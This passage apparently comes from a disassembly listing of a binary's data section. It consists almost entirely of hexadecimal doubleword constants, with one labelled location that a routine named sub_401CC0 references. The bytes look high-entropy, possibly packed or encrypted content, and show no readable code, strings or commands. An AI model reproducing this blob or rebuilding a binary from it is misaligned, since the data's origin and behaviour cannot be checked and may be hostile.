dd 261E2DA2h, 3EFDDDFFh, 142C6FE6h, 0D2D1E097h, 0C1FFDCD1h
dd 0FFF6ED6h, 9DC95FB9h, 0E4FFC0E7h, 0C4FC6809h, 0D5F06ED2h
dd 0F4BF72C8h, 32BEDACCh, 0FFF1A3C2h, 0FFC2A819h, 0DACDEBFDh
dd 0FFB4E0E0h, 8678AD34h, 2FECD3F8h, 0FF4663CFh, 9B2B7F8Bh
dd 0E7A59F2Ch, 0E157F4E6h, 0FF6FB641h, 0E02ED987h, 5F8EB0C8h
dd 271A8CFFh, 0ABCCFF0Dh, 5E4EB78Dh, 0FF42B882h, 0DF1BBEE0h
dd 0B7BDDEA3h, 5C6FD23Ah, 2A93FFFFh, 95AEAFB4h, 322F04ADh
dd 0F7EAC2C0h, 5B634829h, 0CA477FFFh, 79463F00h, 4647FF41h
dd 16DCFC45h, 0FF124C35h, 3A2C98E4h, 75FF5FE4h, 0EA71BF4Fh
dd 5F635B7Ch, 0F20467FFh, 6E17C438h, 759AFFD0h, 0FF48EEFFh
dd 468C75FCh, 0EABD1C65h, 0FF8CC449h, 0E1FF59ABh, 79FF5B19h
dd 635D6EFAh, 397FA1E0h, 6B20E74h, 233CFF3Ch, 7BB7DB22h
dd 1FFC215Ah, 10843D29h, 2CFF5B2Eh, 8D4554F8h, 0FF5FD3ACh
dd 0DAE11714h, 7C1290FFh, 83C5DFE6h, 0C6F8E366h, 0D37EFFC6h
dd 0CBB4955Dh, 0F39FFF91h, 77E0F878h, 0FF1719F8h, 0E3DBDB68h
dd 0F518FFE1h, 0F6975870h, 61F838BFh, 0FF22EF5Dh, 0A6512493h
dd 9B995496h, 0F8A5FF4Bh, 559FA552h, 38FF46A6h, 8EBC497Fh
dd 0B382FC4Ch, 4F6B2CA5h, 3B8DFF6Fh, 8BFF46B8h, 0C6B219FFh
dd 0FF4533FFh, 51D651D5h, 0D0576D91h, 0FFBA3B81h, 0D6173F8Dh
dd 0F2FF434Bh, 9546F142h, 0FF7E467Eh, 584A7289h, 734D7519h
dd 0C295FF5Bh, 0A493CAE2h, 5FDC68FFh, 597E1F86h, 0FAFF0661h
dd 36FC2C65h, 6D54F3B7h, 188F3EFFh, 7CC61229h, 0FFFF027Bh
dd 1B917ACEh, 0FFB71F96h, 0B3150127h, 4810486h, 93056FDh
dd 23FF8873h, 0A5F462FFh, 0B4294A8Bh, 23BF6387h, 3B3A20A3h
dd 0D4FF5D24h, 0AF26ACFAh, 0FF37B52Ah, 15E1BE33h, 7FFFD32Dh
dd 0A98A40CBh, 0D8F8E0D0h, 0DDE4B80Ch, 3A60297h, 0E7FFCDA4h
dd 33FF42E5h, 0F977FF1Ch, 0C61BF974h, 0E3FCFFFCh, 0BB770AE2h
dd 54FEE19Ah, 16E85BE8h, 0FFB7EFD7h, 6F0EE93h, 0A92EBCCh
dd 7FFFA4FFh, 0B9F38B9Fh, 88F82E83h, 0FC5D86BDh, 0FF6D6D54h
dd 0FFFF48ECh, 0C90A226Ch, 0C227ACA8h, 8D02BEA9h, 2391FF18h
dd 0A6A7A199h, 3CFF86A5h, 94ACD5F6h, 0FF1E02ADh, 47536928h
dd 54546ECDh, 0A75A5BFFh, 4122E3CDh, 0FF42A164h, 0D341407Fh
dd 65738F9h, 4C4432FFh, 0BFFF7F0Fh, 0FF467C4Ch, 5CFFBEFFh
dd 5083C164h, 8BC68FFh, 6C6D6F57h, 84D3D013h, 2D0A43BEh
dd 0FF851B15h, 42888DF8h, 0FFB11861h, 27FF6B93h, 540E3674h
dd 0FF320AC0h, 360E56E2h, 3A02C7BBh, 27AF99FFh, 24341AFCh
dd 0FF208127h, 14F6B919h, 0D0FFFFD2h, 0A88941CEh, 0D8FFE2DFh
dd 65DEDFD8h, 0A9BE9F4Bh, 20C1FFC5h, 0C853FFFFh, 36C0FCF0h
dd 0CCF5FFFAh, 0F8F9FAFAh, 0A1EB699Dh, 0BEFFE780h, 0F3E7DD13h
dd 7DFFA417h, 0EECF7B8Ch, 0FA94CA1Bh, 0A353C061h, 9FFF5A9Bh
dd 0FF2074DEh, 90FFB79Eh, 43FF1BD0h, 0FFE4D5D3h, 0FFB0B7FFh
dd 0B78F3D87h, 0FFBBFF5Bh, 0C3E42E40h, 0E22701BAh, 0B098D2FFh
dd 9CA2A1A3h, 0A8FF0BAAh, 0F13954FBh, 0BFFF57D0h, 0E556E6EFh
dd 0FF42275Ah, 9C3E8AFFh, 43794353h, 0F42795FEh, 0E04AF746h
dd 409FF17h, 403F4E23h, 46812478h, 1CA87118h, 0F0B5FF8Fh
dd 7617FFD8h, 6FE26BE5h, 12AB54DBh, 23107FFFh, 1F684981h
dd 838FFF4Bh, 6D71FF98h, 312BE62h, 0E1D0788h, 3346F0FFh
dd 0CDBE750Ch, 8C313DF2h, 0D45CBB7h, 0B8FFA881h, 0DF3D3F07h
dd 9CB46AFFh, 1E3AFC5Bh, 55AA6527h, 0EEFF9E8Ch, 0DADBD4D4h
dd 834F63F8h, 0FF37D9A2h, 0FF6EA117h, 8C755CD1h, 0CEFF81FFh
dd 0FAFBF4F4h, 436D1AFFh, 0E2C4E182h, 9CFF1BE2h, 985973FFh
dd 6DEA6EF7h, 0D6CFFFEEh, 0A9F246EEh, 0FF569791h, 0C60CCEFDh
dd 0FF489CE5h, 0FF8550CEh, 48971FFFh, 8EB58F86h, 82BED598h
dd 918EFFBEh, 0FF2DB58Dh, 289BB9FEh, 9BB8C1E2h, 0A7A0FCDFh
dd 0F8FA32C2h, 2A90AED7h, 382FFF51h, 0FFA24551h, 54DD54DAh
dd 455860CBh
dd 19FFC8A1h, 0FEFFC659h, 4B722A9Eh, 0A2059848h, 7C727FC0h
dd 47CA5BFFh, 0FFF48EFFh, 0E97A1BDCh, 8D6BE667h, 6E6E50E1h
dd 85F878FFh, 3C03D44Dh, 0FF58E4FFh, 0DBC660CFh, 0DFFF0535h
dd 16FF69A6h, 9C31FF00h, 0EF340B3Eh, 0FFB0AE42h, 9FFF5AB1h
dd 0A9BD32FEh, 2F7FFC22h, 2B299516h, 0E0FF02D4h, 0FF3BBC3Ah
dd 4C0B536Ch, 1D2DE8DFh, 0C2E65FF3h, 0D104A612h, 0FF8FCBCBh
dd 0FFAF5BBEh, 0F47AF58Eh, 712BF47Dh, 0F972F9F0h, 0C6FF7A77h
dd 0D14F53FFh, 0FF1E91A3h, 0E7C802E4h, 9FAB589Eh, 0F79EA5EDh
dd 4FFF0649h, 0FF321A64h, 0B08890F1h, 0B48CB289h, 7CD460C0h
dd 860BD1FFh, 34BEF8DFh, 0B763B13Dh, 0FDA919FFh, 964CA91Ah
dd 0FF6FACACh, 0FFEBC51Bh, 596F492Ah, 5CEA0CB3h, 425CEDF8h
dd 0FFDF437Bh, 18D24A47h, 884E37FFh, 4C764F45h, 58FF0B4Ch
dd 0A2BE7FEh, 7A7A4C71h, 0E917FF97h, 670021FFh, 0A8876259h
dd 675EFB84h, 0FFE46D83h, 90FEE319h, 561A9316h, 33FAFF25h
dd 2245AC5h, 9400FF37h, 2BB993DBh, 808FF32h, 9BAC0E0Fh
dd 358B4E6Fh, 38B0FEFFh, 0C77738BFh, 2B654FFh, 0BA22C043h
dd 5F4AFEFFh, 7D4EFAFFh, 5BD1FB17h, 0B4DB1162h, 7FFFD154h
dd 0FF87FF78h, 9951F7FFh, 0CBF1CFB8h, 0F5C8FA65h, 179319CFh
dd 8C5E7FFh, 0A56ACEFFh, 0B116CFFFh, 0E95BFF45h, 0D578E958h
dd 84FFE2EEh, 0D93AACCh, 0FEAF5010h, 0A3378D99h, 7A7ED9Dh
dd 0EAE612FFh, 0DBDDE553h, 0FF76E95Fh, 0FFDCD137h, 0FF63DCA6h
dd 42CF13Ah, 0FF0DA2C3h, 7CBEFFA2h, 0BCA69EA1h, 0AAE29202h
dd 0FF37CE7Ah, 53FF6AEDh, 0DADEB090h, 8458D558h, 0EC64FFB4h
dd 0C5355CFFh, 0E94FC24Bh, 6418DAAh, 16A27278h, 1AAEFF97h
dd 7F7941FFh, 0F4567D7Eh, 641DD23Eh, 39C0E4FFh, 4C86739Fh
dd 0FF12916Bh, 61A28ABEh, 0B971BB00h, 0C72D37FAh, 8A5F0434h
dd 0D34DB86h, 7F2990A3h, 42CE3209h, 38C4F469h, 0D3FF3C3Bh
dd 972618DAh, 0FFFF24FFh, 335495BFh, 572C21EFh, 0D154D1F0h
dd 0B7FFF104h, 0B67BFF6Fh, 0C3DDDBE5h, 52F0BBFFh, 6FD8B97Ah
dd 0EBC17FFh, 0DCDC2FEh, 0F341F2C0h, 86768D96h, 0C01BFCFFh
dd 0FCFDFEFEh, 0D25DBF4Bh, 0E4FFFB9Ch, 36678B31h, 0B8AC3FC5h
dd 87596600h, 9B7FFFFh, 0BB9DFE3Fh, 83FFFA84h, 4788B002h
dd 0EA8DB486h, 0DCCE878Dh, 1BD76506h, 0B3FF8EFFh, 5875BA81h
dd 0FABF8604h, 98DFF340h, 0A4FFDFA6h, 0D4153F74h, 36BAB3D4h
dd 0FF5C63BBh, 1BFE3785h, 215F5498h, 0FFFF93FFh, 70444A87h
dd 0FCB7A348h, 0C79F4D74h, 0FF5DDC42h, 0D5FF6FEAh, 49D4B88Ah
dd 0BAFFB17Fh, 0FF4653A0h, 0B86C47B1h, 7FFF0C89h, 172FEA75h
dd 0BE161415h, 5F448EE8h, 0D61E261Ah, 23AFF62h, 53D9210h
dd 9F80A0Bh, 7152988Ch, 0D03004D8h, 0B1FF7827h, 1A9E9FFFh
dd 46F2D222h, 9A9CF2FFh, 47503FFBh, 6CBAC6Dh, 0BB01F8FFh
dd 16EB1Bh, 0F8D8AD0Ch, 0C1F9A216h, 92FF37C7h, 0B476885Eh
dd 37FF4A6Bh, 0C27EF1FAh, 32FFCDF1h, 0EF6278E3h, 0D3A3FF85h
dd 991371FFh, 8BE6362Eh, 0A0E4FF23h, 0FFFFF53Bh, 858686B8h
dd 1FFEEE84h, 0B693F435h, 0FF058C8Ch, 0B25A1FFh, 0B88FA9CAh
dd 0F590C1D2h, 36D8FF8Fh, 0A2DBC2FCh, 3D59FAFFh, 0FF6FA991h
dd 2DEEC645h, 55D94CFCh, 1FDE55DAh, 15FDDEFFh, 94407888h
dd 90FF0B20h, 0FF662488h, 0FF06ADFFh, 0A5734989h, 74744E17h
dd 0F57A7BE8h, 61029BDFh, 7BE16047h, 75FF592Ch, 0FF632949h
dd 30FAF01Ah, 0FF1B166Fh, 1793FEAEh, 0D9881B9Ch, 1ED63711h
dd 0FFCDBB14h, 7F58353h, 0BD700B8Ch, 0D9E83AFFh, 9B26FFBFh
dd 0FAC9350Ch, 8FB78DFh, 9FFBA38h, 0A2FF8FA5h, 261D2C18h
dd 5E8D930h, 4606FFFFh, 0FACCAD6Eh, 0D2A9D5ECh, 16D6975Dh
dd 0DEE5FAD1h, 7FBFC8DCh, 0F1C6FEFFh, 0CBF2FFC2h, 0F7772902h
dd 0A0C411F0h, 25FF7C8Eh, 0F4FEC6DFh, 0E2FFDAD2h, 0E7558632h
dd 0EBA8EB5Ah, 0FFEEE329h, 9BFF7CC5h, 0A715FF1Ch, 84EFF2Fh
dd 1D18F6B3h, 85FF9F10h, 4C9EFFFFh, 8D0A8D09h, 0B0FF8AE1h
dd 99B6B7B0h, 0A1C6E723h, 0BD74FFBDh, 77FF0FA6h, 0D81933F4h
dd 7D366EB7h, 82FF23CFh, 26B5E2FFh, 0A643FF5Fh, 0D1FF5AD2h
dd 5F66BA5Eh, 0C5AAEC08h, 0FFBA4678h, 9C97C744h, 0FF484B34h
dd 0CBE574FFh, 78F2690Ah, 8078FDE0h, 0D89FFF49h, 0E8EA6BEFh
dd 0FFDF0B6Fh, 152B2BE5h, 0D7AFA0FFh, 6CA71820h, 0C81CFF24h
dd 5901387Ch, 3DF460BEh, 8C866307h, 219EE7FFh, 7FFF814Ah
dd 0B73CB01Eh, 0FF14C03Ch, 78B20AFFh, 0FF4B2E57h, 0FF308922h
dd 0E3F80D19h, 0FF37D9DBh, 60ED48F2h, 0CBFFDEBFh, 971EFAE6h
dd 8AEB3BAAh, 74FFDA0Dh, 0D39CFF11h, 0F4CEFF48h, 9048FF17h
dd 0EE7854FFh, 5393DE2Ch, 0FF908D9Eh, 76FFFE02h, 50B29AA1h
dd 9EE0A652h, 0FFEAF5A9h, 93FFC6E2h, 39F8FFA7h, 0AAB13AB1h
dd 0B0FAFF0Fh, 0B9C2E32Fh, 9BB5FF37h, 0D4CFFF18h, 25AEFA26h
dd 5DDD8652h, 18EF577Bh, 0C959FCFFh, 7F472001h, 0F0467DFFh
dd 0F8FB1CD2h, 762E9AFFh, 4495294Fh, 0BF30FF12h, 0FF01FF1Eh
dd 52A0CA7Fh, 0FF6AA767h, 32695064h, 6E5582F0h, 0DEDC46E1h
dd 613D70FFh, 27EFF1Bh, 180730FFh, 0FF1636FFh, 0F0D0432h
dd 40FCFF58h, 3F4081ABh, 27B3DFE0h, 18932BA6h, 98D5D0FFh
dd 2FFFD4FFh, 6F886CFFh, 0F1FAFF1Fh, 0F0219DC3h, 300BFF0Fh
dd 0CDFFFF0Eh, 0C19B21F7h, 569F2DFBh, 0EBE23EFFh, 0FF091C35h
dd 0BFE9D1B4h, 660EDFFh, 8CB7ED2Eh, 0BD98CFFh, 0B4C09BD6h
dd 0F5FF3CD2h, 9D7DFFCBh, 2F8C0E31h, 0BC721D82h, 0FFDAB188h
dd 0ADFF977Ah, 0BC3EFFECh, 98C5BC39h, 45FF95A1h, 0B3A79D72h
dd 0ADAA9100h, 6CE2FB54h, 0FF6F539Dh, 0EF67F662h, 621988FEh
dd 41667859h, 0E65BFFB5h, 2692FF42h, 9F497FEDh, 8FFFCB29h
dd 72FF45C2h, 0DB3DE496h, 72FF6CFEh, 1C78C8FFh, 0B26AAC34h
dd 4AFFFF2Bh, 0FA67D569h, 37566D1Fh, 6EFFFF8Dh, 9120C627h
dd 0FF0C06CEh, 2C9727C4h, 76192295h, 139C2CFFh, 2D58EC9Dh
dd 0CB11FF34h, 320C08D6h, 75C17109h, 60FFBE0Bh, 1718ABFCh
dd 0FF18B766h, 30780A8Fh, 21076B14h, 0A341F7F4h, 2626BF11h
dd 3F1BDB82h, 0A0FDE1FFh, 0D060DAD8h, 0FF720264h, 118CAB42h
dd 0FF7D7B64h, 0D17E7B86h, 6C166A15h, 6C8539FFh, 0AF656765h
dd 795BFFE2h, 0AAA9BE8Fh, 0ACFF85A2h, 97A5ABADh, 0FF591F20h
dd 0E0B982BBh, 0E0A98247h, 30034FB7h, 0C9828154h, 9A15387Fh
dd 8151E46Ch, 277F0682h, 0E5E48D52h, 0BFDFFFBh, 93C9377Eh
dd 0EDA3E49Dh, 60907F17h, 139FF93Bh, 9C0E9EFFh, 60ABBE7Dh
dd 0AC87DBCDh, 1FFFA73Fh, 0B9DB1920h, 0FF12A60Dh, 0A986B5A4h
dd 998E814Eh, 840107FEh, 659B962Ch, 6BFD0905h, 9A066986h
dd 29764B8Eh, 7A8622FFh, 0A42A40D5h, 876DF69Fh, 0A17F6B6Ch
dd 7B597F15h, 0A7A48391h, 0E1FF2A52h, 0B9570920h, 0BBFF89E4h
dd 0BC30BE31h, 0EDAA15F6h, 7FB8AC16h, 8DBF71F8h, 6FB79DA4h
dd 0BFF6042h, 0E986EFC9h, 0FFA4CFB7h, 8EA4E58Bh, 14FA0DFFh
dd 826AE4FFh, 834BE2EFh, 0E5E7FFE4h, 3960DF9Bh, 7F64A9F7h
dd 0F92662FFh, 28BEB1DBh, 0ABBD35FEh, 0A8ED84ADh, 2CF90FDEh
dd 8E8D97BDh, 8272FF72h, 0ABB9616Ah, 0EF6F6483h, 0A1E0977Bh
dd 9E7F8E19h, 1D934F6Ah, 0CB69FF82h, 9D9A828Dh, 82FF7896h
dd 8245E0A7h, 0FAB581AFh, 0D6C8A682h, 6ABD3401h, 0A4203623h
dd 0D6AF3FDFh, 0BBEB7920h
dd 5BF38299h, 0A0FEE724h, 7CEE7BC5h, 7FEF2CECh, 0DDA0FF82h
dd 9AA40F7Fh, 0E982F6EFh, 0FF3F7A7Fh, 628C16AFh, 0F6BCA3E5h
dd 0ADAFAE6Dh, 0C560FE47h, 0DD60BF82h, 96AE07C7h, 0FF417BDBh
dd 0ED271260h, 0FBFF9D9Ch, 490FE0FBh, 6C7F836Bh, 7F828C48h
dd 8748BFABh, 0E2AD416Bh, 8E91FF78h, 0D05669Bh, 284B0E9Ah
dd 0ADBDFFE4h, 0CAAEAB86h, 0A6F6BB8Eh, 0FBA0D60h, 0AA825CFEh
dd 0DBE03081h, 7FB8A247h, 5A323B9Eh, 0E5BBF4A4h, 978380EFh
dd 0E884FBF8h, 5EFBFC0Bh, 0EDEB9385h, 0E4517FEFh, 14ED9A1Dh
dd 0DB270D9Ch, 2EBF0A3Dh, 0DF7F23B3h, 6407BC7Fh, 3FAF9FC2h
dd 78C760E4h, 0B40BE0B4h, 5D7F2A7Bh, 0BE648D0Eh, 0E07A7DFFh
dd 698BEC17h, 62FF2762h, 17859B27h, 29AEC2AFh, 83A5F07Eh
dd 0BBBF2EBCh, 4F8B17B3h, 0E34F08A9h, 6F0F2616h, 0E6FCEF91h
dd 0EBF62164h, 0F8EA6FE5h, 85EDFFFDh, 6887E5FCh, 97935FA7h
dd 0DF0EE60Bh, 68BFAFE4h, 6CCF6B77h, 8FA5FEBBh, 0BFBDBBA4h
dd 0CB3DDF7Eh, 0EDAE13A9h, 7DCAAC14h, 9D9BA5FDh, 0BCF72054h
dd 6D647D6Fh, 0F1F7C74Bh, 7F591BE0h, 7C063EBFh, 0B7649F61h
dd 0E0150F6Bh, 5F7B39C3h, 7769E361h, 0CB4AC67Fh, 0BB91AE86h
dd 86BB8094h, 0B45B7D1Bh, 7F2F379Dh, 467720B9h, 8BE4FF4Dh
dd 9E9B869Dh, 0E8FFDD57h, 0A3DB84EFh, 0FF8C77FBh, 0FBFDF981h
dd 0CAE6E99Eh, 85A00F1Bh, 0A0C75FCBh, 46F87FFBh, 0C6ABBA64h
dd 0D959A0BFh, 412FA2B6h, 0ADE3BF85h, 7F8B225Fh, 129E1797h
dd 0F9FB559Ch, 0EB6CFA6Ah, 82A9BFF3h, 183A657Ah, 36C87F08h
dd 0F6D09AF8h, 0E7A1560Eh, 22F4A5FFh, 8EBF496Bh, 0BFA6B9EDh
dd 0C6BED67Fh, 4288A9E0h, 6FCFF00Fh, 42CA2F8Eh, 8EFF7BE7h
dd 0F0B8FC4Bh, 0FB66F2F6h, 8CE1D729h, 0F27F07E5h, 0CE4FF982h
dd 12EAFF17h, 0E6110FECh, 4BF0E41Eh, 8E9D8F5Ch, 0D7AFBA6Fh
dd 0CA7E4781h, 8FD9FB22h, 6A009B2Fh, 4AAB611h, 0A3F941Fh
dd 0D05FD06Ch, 83D10567h, 9EFFBF77h, 7C87CF4Dh, 5B0F7BB7h
dd 4B29FCE6h, 6796AC91h, 20763F6Fh, 837F1FACh, 0ABAFACB7h
dd 5F3D4B29h, 0BB86B9FFh, 0AB9EA783h, 7F4D84E0h, 0FE83AE63h
dd 99FCA518h, 0E2EF1FEFh, 0FA0BF468h, 98B0FC0Eh, 5E076AE7h
dd 235D548Fh, 605FD460h, 0EDAB8FB0h, 0C8FE037Fh, 34BA3DF3h
dd 4F1728BCh, 0E4849512h, 0D0C06A0Fh, 8343ADAAh, 7F5C62C2h
dd 3BE2473Fh, 0DF87759h, 0B77C0C7Eh, 4AB0FFDEh, 0BB0F1637h
dd 0DBF0518Ah, 9B20C31Fh, 0AE33AF7Fh, 0FF37AC3Eh, 0BC3CBA3Fh
dd 10BA315Bh, 0F47A4FEh, 8F84AF22h, 9E0DCFEFh, 52C09C0Ah
dd 0C132BFFEh, 0EB86AC1Fh, 22C9FF48h, 86FCD933h, 0BDBE9E99h
dd 20B2AF3Fh, 0FE7B0817h, 0E9BA8246h, 0CFC7827Eh, 0F9E12052h
dd 0BFBF99BFh, 0F86AFBFAh, 6F18526Ch, 31BF485h, 879D8D77h
dd 0F61AFF0Bh, 937957EEh, 0BFCAFDFFh, 0ABB6DCCAh, 3F826FCEh
dd 7B225A3Fh, 0E4FF8F59h, 0FF28A596h, 1690B184h, 88E4E177h
dd 0E9B3BFFFh, 42E6EBFEh, 85DF7E68h, 9CBAFB8Eh, 0FEFB86FFh
dd 24EA9E34h, 0F2986BAh, 0DF91BEB5h, 0EB22B8BFh, 0AF0BB7C9h
db 46h
dword_4395BD dd 1B6FE58Eh ; DATA XREF: sub_401CC0+B3�r
db 7Fh, 0D2h, 0DCh
dd 1E9FF73Eh, 8C742CFFh, 229F257Fh, 622F51F4h, 67FD82CCh
dd 99A4C862h, 0A0FFB56Fh, 7F41E7A3h, 15391A7Fh, 7DBBCA7h
dd 0ED132FA9h, 3FB99E8Ch, 0ABA09F9h, 511FC6A4h, 77B97B20h
dd 776034DFh, 0E47AE6FCh, 6FEC87EBh, 6689E7FFh, 0F1DB39FDh
dd 8FE798BCh, 0DB62B4FFh, 0E05FF9B1h, 0DA26CFA5h, 0B35FB342h
dd 825B4A52h, 8E57BEF1h, 5FBF8F08h, 0B98BD72Eh, 7D9A63B2h
dd 6682C97Fh, 6D36A29Bh, 0EF6F6DFDh, 2E1FE0D6h, 71B7C85h
dd 2B81E204h, 7FBF47FDh, 109E117Bh, 5FBF7A9Ch, 2EF44F6Fh
dd 0B8B15B79h, 0FE5DE0BFh, 4F0D2A0Fh, 25EAC1B6h, 229BFB43h
dd 779BD51Fh, 0EC04FC7Bh, 0EBF7426Fh, 7F7F79E2h, 94BC4D25h
dd 0EAF582E7h, 8F3DC453h, 0D962A0FFh, 0B7B1F7CEh, 484FDF3Fh
dd 3E4BFA7Fh, 0B35BCBE9h, 3F5711AFh, 9C832170h, 0F19B1FB8h
dd 714FEBDFh, 0A0FC6B86h, 0A07B8E45h, 57F635Dh, 11075638h
dd 2E15FADh, 19BFA90Dh, 0FB8E402Eh, 5B7FC5Fh, 0A7FE653Eh
dd 9E93E484h, 0FF06E692h, 9A0775EDh, 83C6DDFDh, 53ADEB7Fh
dd 0F1DFC234h, 885FF07Fh, 0FF0EAD9Fh, 0D96EABF6h, 9FF643FBh
dd 0E1677DE2h, 18EFE689h, 0DFBFD9EBh, 83A30D92h, 63277278h
dd 2BBD354h, 7FDD9A11h, 0F0660FB5h, 7F5B8F64h, 8ED0E06Eh
dd 8616DF79h, 0A498887Eh, 4470FF85h, 3FFB33EEh, 23306270h
dd 2E3F0CFFh, 84F0BF6Bh, 0BE8E8FA4h, 0ECAB9AF6h, 0FE4C259Ch
dd 9A13A78Bh, 0EB609C16h, 1D7F8CF7h, 5FB4604Bh, 802BCF9h
dd 7F23DEE4h, 97F1FEFh, 9C089EF6h, 2E9FF92h, 78182F84h
dd 967C7F3Fh, 0AA19A7FDh, 0FFDCAC18h, 22039B57h, 71DBB7D9h
dd 6D4DFB7Eh, 5BC16EFFh, 0FF7DAD7Dh, 180F6E8Fh, 0FFB7D78Fh
dd 5518B2FFh, 0BEB05EBCh, 5BFFBEA5h, 8CDBFC7Bh, 5BDECFBDh
dd 33F4AED0h, 0DC1F8C2Eh, 9C87C3C7h, 60CE7F36h, 1FE9D3B6h
dd 0B85FB6Fh, 91F8D703h, 977FEB9Eh, 0D020FC6h, 99FBD87Dh
dd 147BCABFh, 0B07F23EFh, 7EBAE23h, 783FC497h, 5CC4D0E2h
dd 2A641202h, 0BD7BD422h, 0FC7A6A87h, 97E57BDh, 0DD05681Ah
dd 0DF864B79h, 8CA74E03h, 92FF93F1h, 0BCE5428Eh, 0F0B2B745h
dd 0A5B9ECB2h, 5A50FF2Fh, 0BB88E3FCh, 0BF4251E4h, 850DA2E6h
dd 0FDDF1F16h, 0B7EB77A2h, 0F9D781E8h, 7F97194Ah, 7EDDD4FFh
dd 1BEE5F29h, 3F1BD1CAh, 0DFBDAFE6h, 0BFE09C02h, 28BF6AABh
dd 85B3BFEEh, 0F5BF05BCh, 0F20F3A5h, 0F1AA13DEh, 0FF11CAA4h
dd 6EA9A493h, 63F37FFAh, 731E8472h, 0FB3A574Ah, 2FFFC54Fh
dd 97793B19h, 0A6FFFF02h, 6AE3B83h, 0BF638FACh, 4BC96EA3h
dd 2F7FDCA9h, 0E187D287h, 727F4DC4h, 8230D7EFh, 7687FFF0h
dd 10CDE77Fh, 0F09BF10Fh, 0BFC67F38h, 6F7B1CDDh, 0C894D7FFh
dd 0DD38C123h, 63224F3Fh, 0B3FCCFFh, 64C50E66h, 757FA3F0h
dd 7DFD0B63h, 91D9845Dh, 2DA487B4h, 0E02FDC42h, 0FE62A6BEh
dd 0AA86D823h, 37CBCA91h, 5D42977Fh, 7F48B343h, 5B22A2F0h
dd 8FE8BF27h, 0F4D36FFFh, 0FF0D7B6Eh, 0F83E2C2h, 0FF81CA36h
dd 9A1F99F7h, 0F8A39C1Ch, 0A4389A09h, 0B37FC703h, 0DFF9E422h
dd 0E207F8B1h, 6FFF3D1Ch, 8032E75Fh, 0B138EF02h, 795FD8E0h
dd 0E462FFFEh, 9678DEC7h, 0F056C83h, 0E2116BE0h, 61918FD8h
dd 0A437B6DFh, 57A73DF3h, 0FC7F3EADh, 0AA8FB794h, 2D4C0C0h
dd 3F7B9788h, 0CF756B5Eh, 0C87FABE9h, 7CFA7F7Fh, 0D6BC7EFCh
dd 0FC7FE586h, 85A364A2h, 0C1074DECh, 0DB97831Dh, 0F81A639h
dd 3EAA3DEDh, 17815A45h, 5D57BD3Fh, 7F02978Fh, 0DF260B3Ch
dd 0FF13033Eh, 0A2607F04h, 7F07FFFFh, 90B76D84h, 1B6F827Fh
dd 94DBAC91h, 0B7C61B67h, 22D1A358h, 0AE3184FDh, 63CDAC36h
dd 874B5ABFh, 0FFABB149h, 7F6F839Dh, 0B7FD9129h, 6EDEFE4h
dd 6B5F6081h, 0FF42EFFBh, 7645FDE8h, 8F857D0Fh, 6690E5E9h
dd 43DC400Fh, 6FFCAD3Dh, 0C4F0E66Fh, 32A63FE2h, 0E5FFA2D6h
dd 7E1279BEh, 17C3B8DBh, 0BFAE06C2h, 0E7BD60E9h, 70DA7CFEh
dd 7F0D7E7Eh, 0FF8E18D2h, 627BE072h, 0A0691FA3h, 6CCCB0BFh
dd 5F7AEFA3h, 0BEFF0BEFh, 9E0EBC0Ch, 0A4CFBBA6h, 0E6624FA3h
dd 0E76CFF70h, 6F776B6Eh, 1F60041Eh, 0FA8283DFh, 0F38DBA55h
dd 882E07Fh, 927FC7BAh, 0C9D7E41Eh, 0A7A2F6B3h, 4CD432FFh
dd 8BFCF899h, 797C8BABh, 55F4C173h, 565ECAF0h, 40F01C9Bh
dd 0FF55518Eh, 0C928F24Eh, 0CF2C1423h, 31D14150h, 7DAA0361h
dd 0F603EB8Fh, 63BD000Fh, 0D1BD7E8Ah, 0C4125625h, 9F48EAC5h
dd 7CD08108h, 740E8F9h, 0D0BDA251h, 55BF0024h, 100C00EAh
dd 707FFEDh, 868A0908h, 0AFF2968h, 0F911E3CEh, 0FFDE1210h
dd 161AFCE9h, 0D01EF042h, 7FE63E89h, 27C8452Eh, 5CFFB89Ah
dd 2A5D2A5Eh, 0FE2FC5B8h, 6431302Fh, 0D1170BCh, 363AFF82h
dd 483F4F1Dh, 81FFA03Fh, 46A842B3h, 0FFAC6688h, 0A36A844Ah
dd 4F4E4D4Dh, 7F2C8AABh, 54BEA877h, 0B2FF1D0Ah, 0B57C9658h
dd 0FF605F5Fh, 20EC4361h, 698F9A41h, 6B6A69FFh, 4B0AE032h
dd 26FAFF74h, 749E7857h, 7FFC478h, 2F7D0479h, 0FF807E96h
dd 0B578281h, 637BA2C1h, 80898BFFh, 8F8E8C64h, 1F41FF90h
dd 7D91B0F7h, 0B9FF5595h, 0BD519971h, 0FF3D9D75h, 0ABA14990h
dd 0D1A4DE00h, 4036A8FFh, 34F896AFh, 0B2B0FF58h, 39C1B4B3h
dd 45E99CF3h, 7FB9BA52h, 0A54D42BEh, 0BAFFC7E6h, 60C6B9C6h
dd 0FE06C822h, 0CFCF25ECh, 0B7B4D1D0h, 0FFD2F199h, 0DBA6DBA9h
dd 71DF37C5h, 0E3FFE756h, 24B3898Ch, 3FEE717h, 7389DEBh
dd 6D176BEEh, 55FFF11Ah, 337B2D9h, 0FEFB11F8h, 68FDFCFBh
dd 25254470h, 505FF2Bh, 84C40706h, 8FF2F6Eh, 6C0FFACCh
dd 0FF126F12h, 68156BC7h, 19F10C19h, 0F60540FFh, 2221201Eh
dd 41A9FF08h, 2BC32302h, 0C01207ECh, 0C3EE2EFFh, 45304231h
dd 0FFB534DDh, 3DD3FF98h, 23F3E3Dh, 67FF26CCh, 8A44AE40h
dd 0FF4BA168h, 854D4C4Bh, 0AE7514C0h, 0B82EDEDBh, 0EB54FF54h
dd 5D5DB398h, 0BAFF5F5Eh, 604706ECh, 0FD43658Eh, 69811796h
dd 426F9BDAh, 0F0578A70h, 56B87698h, 86DFC268h, 0E1C87F90h
dd 7A651589h, 97A2D221h, 0FF8887DBh, 0E8064D89h, 92648AA9h
dd 78629EFFh, 0E7B65896h, 9BE8F89Bh, 58695DDAh, 69DFA228h
dd 8668A648h, 845F66DBh, 0A36FFA9h, 0CA62AC45h, 76FF3243h
dd 0B8B7B60Dh, 0FF21B852h, 0C0BDC3A7h, 0C0B8AFC1h, 76C4BFFFh
dd 21C93806h, 0ED01FFC9h, 39D0380Fh, 0D4FFD3D3h, 9C58E5D5h
dd 0FFA126FDh, 18DFA6DFh, 0E299E29Ah, 7E759CA3h, 0EB01C82Ah
dd 809137EBh, 0D594FF62h, 12F718F6h, 10ED45C0h, 0FFFFFAF8h
dd 24BB71CFh, 4F0C3FDh, 1C05EEFFh, 9E1D845h, 9F2DA3C1h
